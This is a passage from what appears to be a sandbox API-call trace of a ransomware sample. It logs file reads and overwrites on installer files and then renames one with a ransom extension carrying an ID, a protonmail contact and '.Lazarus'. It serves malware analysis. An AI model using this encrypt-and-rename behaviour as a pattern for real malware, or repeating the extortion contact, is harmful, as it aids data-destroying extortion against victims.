returned 1 [0066.023] WriteFile (in: hFile=0x410, lpBuffer=0x8e650*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8e650*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0066.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e650 | out: hHeap=0x20000) returned 1 [0066.023] CloseHandle (hObject=0x410) returned 1 [0066.060] AreFileApisANSI () returned 1 [0066.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.060] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0066.060] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 41 [0066.060] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0066.061] GetFileType (hFile=0x410) returned 0x1 [0066.061] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0066.061] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0066.061] ReadFile (in: hFile=0x410, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0066.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0066.158] ReadFile (in: hFile=0x410, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0066.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0066.169] GetLastError () returned 0x0 [0066.171] SetLastError (dwErrCode=0x0) [0066.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0066.172] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0066.173] WriteFile (in: hFile=0x410, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0066.174] WriteFile (in: hFile=0x410, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0066.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0066.175] CloseHandle (hObject=0x410) returned 1 [0066.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0066.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69300 [0066.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0066.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75f30 [0066.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0066.223] AreFileApisANSI () returned 1 [0066.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0066.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi") returned 41 [0066.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0066.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xce) returned 0x74868 [0066.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x74868, cchWideChar=103 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 103 [0066.224] MoveFileExW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core_x86.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x86.msi.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74868 | out: hHeap=0x20000) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.225] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7, dwReserved0=0x124280c4, dwReserved1=0x38f50d3, cFileName="netfx_Extended.mzz", cAlternateFileName="NETFX_~2.MZZ")) returned 1 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0066.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0066.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0066.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.226] AreFileApisANSI () returned 1 [0066.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz", lpUsedDefaultChar=0x0) returned 41 [0066.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0066.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.226] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0066.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0066.226] AreFileApisANSI () returned 1 [0066.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0066.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 41 [0066.226] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0066.226] GetFileType (hFile=0x410) returned 0x1 [0066.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0066.226] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0066.226] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0066.227] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0066.227] CloseHandle (hObject=0x410) returned 1 [0066.227] AreFileApisANSI () returned 1 [0066.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0066.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 41 [0066.227] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0066.227] GetFileType (hFile=0x410) returned 0x1 [0066.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0066.227] CloseHandle (hObject=0x410) returned 1 [0066.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0066.228] AreFileApisANSI () returned 1 [0066.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0066.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 41 [0066.228] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf74cd515, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf7cd9415, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x29222c7)) returned 1 [0066.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0066.228] AreFileApisANSI () returned 1 [0066.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0066.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0066.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0066.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0066.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0066.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0066.229] GetLastError () returned 0x0 [0066.229] SetLastError (dwErrCode=0x0) [0066.229] AreFileApisANSI () returned 1 [0066.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0066.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x66f40 [0066.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 41 [0066.229] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0066.229] GetFileType (hFile=0x410) returned 0x1 [0066.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0066.229] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0066.229] ReadFile (in: hFile=0x410, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0066.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0066.347] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0066.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4f8 [0066.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d648 [0066.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de70 [0066.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e440 [0066.460] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0066.460] GetLastError () returned 0x0 [0066.460] SetLastError (dwErrCode=0x0) [0066.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0066.460] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0066.460] WriteFile (in: hFile=0x410, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0066.460] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0066.461] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0066.461] CloseHandle (hObject=0x410) returned 1 [0067.468] AreFileApisANSI () returned 1 [0067.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0067.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67540 [0067.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 41 [0067.468] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.468] GetFileType (hFile=0x428) returned 0x1 [0067.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0067.468] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0067.469] ReadFile (in: hFile=0x428, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0067.469] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0067.469] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0067.470] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0067.470] GetLastError () returned 0x0 [0067.470] SetLastError (dwErrCode=0x0) [0067.470] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.470] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0067.470] WriteFile (in: hFile=0x428, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0067.470] WriteFile (in: hFile=0x428, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xf90, 